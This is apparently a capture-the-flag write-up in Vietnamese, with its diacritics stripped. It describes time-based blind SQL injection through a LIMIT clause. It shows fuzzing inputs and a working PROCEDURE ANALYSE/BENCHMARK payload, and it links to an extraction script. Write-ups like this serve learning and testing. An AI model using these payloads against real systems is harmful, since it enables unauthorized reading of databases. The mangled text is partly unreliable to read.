Search th xem post th thu c kt qu nh th ly: keyword=superfish&limit=2&find=Submit+Query Ok u tin mnh th fuzz sqli vo keyword trc, c th: + keyword=superfish-- + keyword=superfish-- + keyword=superfish)-- + keyword=superfish)-- Khng tr v kt qu, on rng trng ny b filter bng func mysql_real_escape_string Cho qua Fuzz limit: +limit=2 -- - => OK +limit=100 => OK +limit=2,1 => OK +limit= 2 offset 0 => OK ca tc gi chc l injection y ri. Da theo kinh nghim sqli limit th c 2 dng, mt l s dng select case, if else, 2 l s dng union based sqli, nhng khng thnh cng. Thi th qua thm bc google vy. Sau mt thi gian quay tay vi bc gc th cng thnh chnh qu :chaymau: gii quyt bi ny mnh s dng phng php Time based blind kt hp Procedure Analyse: Ti liu: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ Ok th pht no keyword=superfish&limit=1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)&find=Submit+Query
alt + X (hackbar cho bn no khng bit) v d ngn tay ra m, 1->2->3->4->5
->bingo! Ok blind thi: <y l 1 on python m n lin ch c hiu lc trong bi ny> http://pastebin.com/g7cv7xXd